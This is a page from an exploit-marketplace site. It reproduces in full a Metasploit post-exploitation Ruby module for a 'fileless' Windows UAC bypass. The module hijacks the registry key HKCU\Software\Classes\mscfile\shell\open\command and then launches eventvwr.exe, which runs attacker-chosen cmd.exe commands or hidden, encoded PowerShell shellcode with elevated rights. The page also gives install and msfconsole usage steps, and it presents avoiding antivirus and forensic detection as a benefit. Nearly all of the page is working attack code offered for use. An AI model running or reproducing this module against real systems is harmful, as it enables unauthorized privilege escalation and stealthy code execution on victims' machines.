[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Enigma Fileless UAC Bypass Exploit

Author
metasploit
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-26631
Category
remote exploits
Date add
09-01-2017
Platform
windows
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


##
# Exploit Title  : enigma_fileless_uac_bypass.rb
# Module Author  : pedr0 Ubuntu [r00t-3xp10it]
# Vuln discover  : enigma0x3 | @mattifestation
# Tested on      : Windows 7 | Windows 8 | Windows 10
# POC:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
#
#
#
# [ DESCRIPTION ]
# Most of the UAC bypass techniques require dropping a file to disk (for
example, placing a DLL on disk
# to perform a DLL hijack). The technique used in this module differs from
the other public methods and
# provides a useful new technique that does not rely on a privileged file
copy, code injection, or placing
# a traditional file on disk.
#
# As a normal user, you have write access to keys in HKCU, if an elevated
process interacts with keys you
# are able to manipulate, you can potentially interfere with actions a
high-integrity process is attempting
# to perform (hijack the process being started). Due to the fact that I was
able to hijack the process, it
# is possible to simply execute whatever malicious cmd.exe command you
wish. This means that code execution
# has been achieved in a high integrity process (bypassing UAC) without
dropping a DLL or other file down to
# the file system. This significantly reduces the risk to the attacker
because they arenat placing a traditional
# file on the file system that can be caught by AV/HIPS or forensically
identified later.
# "This module differs from 'OJ msf module' because it uses cmd.exe insted
of powershell.exe"
# "This module will not work if target UAC level its set to 'Always Notify'"
#
#
#
# [ MODULE OPTIONS ]
# The session number to run this module on     => set SESSION 3
# The cmd.exe command to be executed (target)  => set EXEC_COMMAND start
firefox.exe www.househot.com
# Check target vulnerability settings/status?  => set CHECK_VULN true
# Delete malicious registry hive keys/values?  => set DEL_REGKEY true
# Exec powershell shellcode insted of a cmd?   => set USE_POWERSHELL true
# ---
# HINT: To deploy a powershell payload (shellcode string) we need to set
the option
# 'USE_POWERSHELL true' and input the base64 encoded 'shellcode' into
'EXEC_COMMAND'
# EXAMPLE: set USE_POWERSHELL true
# EXAMPLE: set EXEC_COMMAND aDfSjRnGlsWlDtBsQkGftmoEdD==
# ---
#
#
#
# [ PORT MODULE TO METASPLOIT DATABASE ]
# Kali linux   COPY TO:
/usr/share/metasploit-framework/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb
# Ubuntu linux COPY TO:
/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/enigma_fileless_uac_bypass.rb
# Manually Path Search: root@kali:~# locate modules/post/windows/escalate
#
#
# [ LOAD/USE AUXILIARY ]
# meterpreter > background
# msf exploit(handler) > reload_all
# msf exploit(handler) > use
post/windows/escalate/enigma_fileless_uac_bypass
# msf post(enigma_fileless_uac_bypass) > info
# msf post(enigma_fileless_uac_bypass) > show options
# msf post(enigma_fileless_uac_bypass) > show advanced options
# msf post(enigma_fileless_uac_bypass) > set [option(s)]
# msf post(enigma_fileless_uac_bypass) > exploit
#
# [ HINT ]
# In some linux distributions postgresql needs to be started and
# metasploit database deleted/rebuild to be abble to load module.
# 1 - /etc/init.d/postgresql start
# 2 - msfdb delete (optional)
# 3 - msfdb init   (optional)
# 4 - msfconsole
# 5 - reload_all
##




# ----------------------------
# Module Dependencies/requires
# ----------------------------
require 'rex'
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'




# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------
class MetasploitModule < Msf::Post
      Rank = ExcellentRanking

         include Msf::Post::Common
         include Msf::Post::Windows::Priv
         include Msf::Post::Windows::Error
         include Msf::Post::Windows::Registry




# -----------------------------------------
# Building Metasploit/Armitage info GUI/CLI
# -----------------------------------------
        def initialize(info={})
                super(update_info(info,
                        'Name'          => 'enigma fileless uac bypass
[RCE]',
                        'Description'   => %q{
                                        Implementation of fileless uac
bypass by enigma and mattifestation using cmd.exe insted of powershell.exe
(OJ msf module). This module will create the required registry entry in the
current useras hive, set the default value to whatever you pass via the
EXEC_COMMAND parameter, and runs eventvwr.exe (hijacking the process being
started to gain code execution).
                        },
                        'License'       => UNKNOWN_LICENSE,
                        'Author'        =>
                                [
                                        'Module Author: pedr0 Ubuntu
[r00t-3xp10it]', # post-module author
                                        'Vuln discover : enigma0x3 |
mattifestation', # credits
                                ],

                        'Version'        => '$Revision: 1.7',
                        'DisclosureDate' => 'jan 8 2017',
                        'Platform'       => 'windows',
                        'Arch'           => 'x86_x64',
                        'Privileged'     => 'false', # thats no need for
privilege escalation..
                        'Targets'        =>
                                [
                                         # Tested againts windows 7 |
Windows 8 | Windows 10
                                         [ 'Windows XP', 'Windows VISTA',
'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
                                ],
                        'DefaultTarget'  => '6', # default its to run
againts windows 10
                        'References'     =>
                                [
                                         [ 'URL', 'POC: goo.gl/XHQ6aF' ],
                                         [ 'URL', '
https://github.com/r00t-3xp10it' ],
                                         [ 'URL', '
https://github.com/r00t-3xp10it/msf-auxiliarys' ]


                                ],
            'DefaultOptions' =>
                {
                                         'SESSION' => '1', # Default its to
run againts session 1
                },
                        'SessionTypes'   => [ 'meterpreter' ]

                ))

                register_options(
                        [
                                OptString.new('SESSION', [ true, 'The
session number to run this module on']),
                                OptString.new('EXEC_COMMAND', [ false, 'The
cmd command to be executed (eg start notepad.exe)']),
                                OptBool.new('CHECK_VULN', [ false, 'Check
target vulnerability status?' , false])
                        ], self.class)

                register_advanced_options(
                        [
                                OptBool.new('USE_POWERSHELL', [ false,
'Execute powershell shellcode insted of a cmd command?' , false]),
                                OptBool.new('DEL_REGKEY', [ false, 'Delete
malicious registry key hive?' , false])
                        ], self.class)

        end




# -------------------------------------------------------
# GAIN REMOTE CODE EXCUTION BY HIJACKING EVENTVWR PROCESS
# -------------------------------------------------------
def ls_stage1

  r=''
  session = client
  vul_serve = "eventvwr.exe" # vulnerable soft to be hijacked
  exec_comm = datastore['EXEC_COMMAND'] # my cmd command to execute (OR
powershell shellcode)
  uac_level = "ConsentPromptBehaviorAdmin" # uac level key
  comm_path = "%SystemRoot%\\System32\\cmd.exe /c" # cmd.exe %comspec% path
  regi_hive = "REG ADD
HKCU\\Software\\Classes\\mscfile\\shell\\open\\command" # registry hive key
to be hijacked
  psh_lpath =
"%SystemRoot%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" #
powershell.exe %comspec% path
  psh_comma = "#{psh_lpath} -nop -wind hidden -Exec Bypass -noni -enc" #
use_powershell advanced option command
  uac_hivek =
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" #
uac hive key
  # check for proper config settings enter
  # to prevent 'unset all' from deleting default options...
  if datastore['EXEC_COMMAND'] == 'nil'
    print_error("Options not configurated correctly...")
    print_warning("Please set EXEC_COMMAND option!")
    return nil
  else
    print_status("Hijacking eventvwr.exe process!")
    Rex::sleep(1.5)
  end

    # search in target regedit if eventvwr calls mmc.exe
    print_warning("Reading process registry hive keys...")
    Rex::sleep(1.0)
    if registry_enumkeys("HKCR\\mscfile\\shell\\open\\command")
      print_good(" exec => remote registry hive key found!")
      Rex::sleep(1.0)
    else
      # registry hive key not found, aborting module execution.
      print_warning("Hive key: HKCR\\mscfile\\shell\\open\\command (mmc.exe
call)")
      print_error("[ABORT]: module cant find the registry hive key
needed...")
      print_error("System does not appear to be vulnerable to the exploit
code!")
      print_line("")
      Rex::sleep(1.0)
      return nil
    end

      # check target UAC settings (always notify - will abort module
execution)
      check_success = registry_getvaldata("#{uac_hivek}","#{uac_level}")
      # a dword:2 value it means 'always notify' setting is active.
      if check_success == 2
        print_warning("Target UAC set to: #{check_success} (always notify)")
        print_error("[ABORT]: module can not work under this
condictions...")
        print_error("Remote system its not vulnerable to the exploit code!")
        print_line("")
        Rex::sleep(1.0)
        return nil
      # a dword:nil value it means that we are running againts a
'non-uac-system'
      elsif check_success.nil?
        print_warning("UAC DWORD DATA EMPTY (NON-UAC-SYSTEM?)")
        print_error("[ABORT]: module can not work under this
condictions...")
        print_error("Remote system its not vulnerable to the exploit code!")
        print_line("")
        Rex::sleep(1.0)
        return nil
      else
        # all good in UAC settings :D
        print_good(" exec => Target UAC set to: #{check_success}
(exploitable)")
        Rex::sleep(1.0)
      end

        #
        # chose to execute a single command in cmd.exe syntax logic
        # or to execute a shellcode(base64) string using powershell.exe
        #
        if datastore['USE_POWERSHELL'] == true
          comm_inje = "#{regi_hive} /ve /t REG_SZ /d \"#{psh_comma}
#{exec_comm}\" /f"
          print_good(" exec => Injecting shellcode(base64) string
(powershell.exe)")
          Rex::sleep(1.0)
        else
          comm_inje = "#{regi_hive} /ve /t REG_SZ /d \"#{comm_path}
#{exec_comm}\" /f"
          print_good(" exec => Injecting cmd command string (cmd.exe)")
          Rex::sleep(1.0)
        end

 # Execute process hijacking in registry (cmd.exe OR powershell.exe)...
 # REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ
/d "powershell.exe -nop -enc aDfSjRnGlsgVkGftmoEdD==" /f
 # REG ADD HKCU\Software\Classes\mscfile\shell\open\command /ve /t REG_SZ
/d "c:\windows\System32\cmd.exe /c start notepad.exe" /f
 print_good(" exec => Hijacking process to gain code execution...")
 r = session.sys.process.execute("cmd.exe /c #{comm_inje}", nil, {'Hidden'
=> true, 'Channelized' => true})
 # give a proper time to refresh regedit 'enigma0x3' :D
 Rex::sleep(4.5)

      # start remote service to gain code execution
      print_good(" exec => Starting eventvwr.exe native process...")
      r = session.sys.process.execute("cmd.exe /c start #{vul_serve}", nil,
{'Hidden' => true, 'Channelized' => true})
      Rex::sleep(1.0)

    # close channel when done
    print_status("UAC-RCE Credits: enigma0x3 + @mattifestation")
    print_line("")
    r.channel.close
    r.close

  # error exception funtion
  rescue ::Exception => e
  print_error("Error: #{e.class} #{e}")
end




# ----------------------------------------------------
# DELETE MALICIOUS REGISTRY ENTRY (process hijacking)
# ----------------------------------------------------
def ls_stage2

  r=''
  session = client
  reg_clean = "REG DELETE HKCU\\Software\\Classes\\mscfile /f" # registry
hive to be clean
  # check for proper config settings enter
  # to prevent 'unset all' from deleting default options...
  if datastore['DEL_REGKEY'] == 'nil'
    print_error("Options not configurated correctly...")
    print_warning("Please set DEL_REGKEY option!")
    return nil
  else
    print_status("Revert eventvwr.exe process hijack!")
    Rex::sleep(1.5)
  end

    # search in target regedit if hijacking method allready exists
    print_warning("Reading process registry hive keys...")
    Rex::sleep(1.0)
    if
registry_enumkeys("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")
      print_good(" exec => Remote registry hive key found!")
      Rex::sleep(1.0)
    else
       # registry hive key not found, aborting module execution.
       print_warning("Hive key:
HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")
       print_error("[ABORT]: module cant find the registry hive key
needed...")
       print_error("System does not appear to be vulnerable to the exploit
code!")
       print_line("")
       Rex::sleep(1.0)
       return nil
    end

 # Delete hijacking hive keys from target regedit...
 # REG DELETE HKCU\Software\Classes /f -> mscfile\shell\open\command
 print_good(" exec => Deleting HKCU hive registry keys...")
 r = session.sys.process.execute("cmd.exe /c #{reg_clean}", nil, {'Hidden'
=> true, 'Channelized' => true})
 # give a proper time to refresh regedit
 Rex::sleep(3.0)

      # check if remote registry hive keys was deleted successefuly
      if
registry_enumkeys("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")
        print_error("Module can not verify if deletion has successefully!")
      else
        print_status("Registry hive keys deleted successefuly!")
      end

    Rex::sleep(1.0)
    # close channel when done
    print_status("process hijack reverted to default stage!")
    print_line("")
    r.channel.close
    r.close

  # error exception funtion
  rescue ::Exception => e
  print_error("Error: #{e.class} #{e}")
end




# -------------------------------------------
# CHECK TARGET VULNERABILITY STATUS/EXISTANCE
# -------------------------------------------
def ls_stage3

  r=''
  session = client
  vuln_soft = "eventvwr.exe" # vulnerable software name
  uac_level = "ConsentPromptBehaviorAdmin" # uac level key
  vuln_hive = "HKCR\\mscfile\\shell\\open\\command" # vulnerable hive key
call (mmc.exe)
  vuln_key = "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command" #
vuln hijack key
  uac_hivek =
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" #
uac hive key
  # check for proper config settings enter
  # to prevent 'unset all' from deleting default options...
  if datastore['CHECK_VULN'] == 'nil'
    print_error("Options not configurated correctly...")
    print_warning("Please set CHECK_VULN option!")
    return nil
  else
    print_status("Checking target vulnerability details!")
    Rex::sleep(1.5)
  end

    print_warning("Reading process registry hive keys...")
    Rex::sleep(2.0)
    # check target registry hive/key settings (mmc.exe call)
    if registry_enumkeys("HKCR\\mscfile\\shell\\open\\command")
      report_on = "EXPLOITABLE"
    else
      vuln_hive = "NOT FOUND"
      report_on = "NOT EXPLOITABLE"
    end

      # check target registry hive/key settings (hijacking key)
      if
registry_enumkeys("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command")
        report_tw = "HIJACK HIVE ACTIVE"
      else
        vuln_key = "NOT FOUND"
        report_tw = "HIJACK HIVE NOT PRESENT"
      end

    # check target registry hive/key settings (UAC level settings)
    check_uac = registry_getvaldata("#{uac_hivek}","#{uac_level}")
    # a dword:2 value it means 'always notify' setting is active.
    if check_uac == 2
      report_level = "ALWAYS NOTIFY (NOT EXPLOITABLE)"
    # a dword:nil value it means that we are running againts a
'non-uac-system'
    elsif check_uac.nil?
      report_level = "DWORD DATA EMPTY (NON-UAC-SYSTEM?)"
    else
      # all good in UAC settings :D
      report_level = "#{check_uac} (EXPLOITABLE)"
    end

  print_line("")
  # display target registry settings to user...
  # i hope you are smart enouth to recognise a vulnerable output :D
  print_line("VULNERABLE_SOFT : #{vuln_soft}")
  print_line("    UAC_LEVEL   : #{report_level}")
  print_line("    VULN_HIVE   : #{vuln_hive}")
  print_line("    KEY_INFO    : #{report_on}")
  print_line("")
  print_line("    HIJACK_HIVE : #{vuln_key}")
  print_line("    KEY_INFO    : #{report_tw}")
  print_line("")
Rex::sleep(1.0)
end




# ------------------------------------------------
# MAIN DISPLAY WINDOWS (ALL MODULES - def run)
# Running sellected modules against session target
# ------------------------------------------------
def run
  session = client

      # Variable declarations (msf API calls)
      oscheck = client.fs.file.expand_path("%OS%")
      sysnfo = session.sys.config.sysinfo
      runtor = client.sys.config.getuid
      runsession = client.session_host
      directory = client.fs.dir.pwd



    # Print banner and scan results on screen
    print_line("    +----------------------------------------------+")
    print_line("    | enigma fileless UAC bypass command execution |")
    print_line("    |            Author : r00t-3xp10it             |")
    print_line("    +----------------------------------------------+")
    print_line("")
    print_line("    Running on session  : #{datastore['SESSION']}")
    print_line("    Computer            : #{sysnfo['Computer']}")
    print_line("    Operative System    : #{sysnfo['OS']}")
    print_line("    Target IP addr      : #{runsession}")
    print_line("    Payload directory   : #{directory}")
    print_line("    Client UID          : #{runtor}")
    print_line("")
    print_line("")


    #
    # the 'def check()' funtion that rapid7 requires to accept new modules.
    # Guidelines for Accepting Modules and Enhancements:
https://goo.gl/OQ6HEE
    #
    # check for proper operative system (windows-not-wine)
    if not oscheck == "Windows_NT"
      print_error("[ ABORT ]: This module only works againts windows
systems")
      return nil
    end
    # check for proper session (meterpreter)
    # the non-return of sysinfo command reveals
    # that we are not on a meterpreter session!
    if not sysinfo.nil?
      print_status("Running module against: #{sysnfo['Computer']}")
    else
      print_error("[ ABORT ]: This module only works against meterpreter
sessions!")
      return nil
    end
    # elevate session privileges befor runing options
    client.sys.config.getprivs.each do |priv|
    end


# ------------------------------------
# Selected settings to run
# ------------------------------------
      if datastore['EXEC_COMMAND']
         ls_stage1
      end

      if datastore['DEL_REGKEY']
         ls_stage2
      end

      if datastore['CHECK_VULN']
         ls_stage3
      end
   end
end

#  0day.today [2024-11-15]  #